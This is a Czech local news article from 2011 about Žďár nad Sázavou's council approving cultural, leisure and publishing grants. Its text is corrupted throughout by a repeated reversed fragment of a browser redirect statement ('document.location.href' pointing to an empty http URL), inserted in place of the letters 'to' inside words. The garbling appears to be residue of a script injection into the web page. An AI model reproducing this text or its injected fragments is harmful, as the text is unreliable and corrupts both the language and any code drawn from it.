Žďár nad Sázavou, zdar nad sazavou, aktuality, kalendáře, kulturní akce
Rainbow page separator

Žďárští podpořili vydání kalendářů i kulturní akce

Pátek, 25. března 2011

Žďár nad Sázavou/ Rozdělení s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek tisíc korun mezi jednotlivé žadatele schválili v pondělí 21. března žďárští městští radní. Finanční podpory se tak dočkají desítky žadatelů, kteří peníze využijí například na pořádání kulturních a volnočasových akcí, činnost nejrůznějších zájmových skupin a kroužků nebo na vydání publikací, které se týkají města a jeho okolí. Největší převis žádostí byl právě v případě gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového programu Ediční činnost 2011 – doručeno bylo celkem šestnáct žádostí. Z nich nakonec Žďárští vyhověli pouze polovině. Dvacet tisíc korun pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovalo například na vydání knihy s názvem Zámek Žďár a Zelená hora na starých pohlednicích, deset tisíc korun pak na s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolní kalendář Žďárska.
Celkem půl milionu korun bylo rozděleno v rámci grantu Kultura 2011. O finance z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to programu usilovalo 34 žadatelů, kladné vyjádření dostalo 27 z nich. Nejnižší částkou, kterou měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to poskytlo, bylo pět tisíc korun. Nejvyšší naopak 45 tisíc korun, které obdrželo turistické informační centrum ve žďárském zámku provozované firmou Žďas, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na akci Otevřené zahrady 2011. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho byly ale podpořeny penězi z grantu i koncerty, taneční vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení, festivaly a mnohé další akce. Volný čas 2011 je jediným gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovým programem z těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tří, kde nebyla vyčerpána celá vymezená suma. Část ze 400 tisíc korun je tak k dispozici pro další zájemce, kteří během roku přijdou s nějakou akcí, jež bude splňovat podmínky gran[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového programu. „Nebyli jsme přesvědčeni o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, že by bylo nutné rozdělovat všechny peníze. Zbylých 35 tisíc korun ještě necháme v rezervě pro další zajímavé projekty, které se bezpochyby časem objeví,“ vyjádřil se druhý žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Ladislav Bárta. O příspěvek z programu Volný čas 2011 mělo zájem celkem 43 žadatelů, vyhověno bylo 39 z nich. Jedna žádost pak musela být vyřazena kvůli administrativním nesrovnalostem.